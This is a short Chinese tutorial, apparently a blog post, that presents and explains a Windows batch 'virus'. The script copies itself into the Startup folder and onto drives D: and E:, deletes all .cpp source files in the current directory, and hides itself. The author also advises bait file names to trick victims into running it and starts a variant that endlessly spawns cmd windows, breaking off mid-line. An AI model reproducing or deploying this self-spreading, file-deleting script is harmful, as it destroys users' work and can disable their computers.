这个病毒的功能是删除当前目录下.cpp类型的代码。
copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy %0 d:\
copy %0 e:\
del *.cpp
attrib +h %0
1.病毒启动测试:
copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
%0是本文件
%userprofile%是当前用户的配置文件目录
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup加到开机启动项里
将病毒加入到开机自启动中。
接着利用逆反心理设置一个有诱惑力的名字。(平时见到奇奇怪怪名字的软件千万不要下载。
2.病毒如何传染:
copy %0 d:\
copy %0 e:\
通过copy语句复制到磁盘,假如在机房,就有拷贝到U盘的可能 ,之后U盘插入新电脑,看到名字,一双击,就又copy到了别的磁盘上。
还有些病毒通过邮件传染。
3.病毒目的:
del *.cpp
执行一个简单的删除文件操作,把.cpp类型的代码删光。
(当然我们还可以做些别的操作,比如一直启动cmd,电脑很快就会蓝屏的,一般来说重启就可以,但是因为把病毒加入到了开机自启动中,重启后立马又会弹出窗口。附上代码:
copy %0 "%userprofile%\AppData\Roaming\Microsoft\W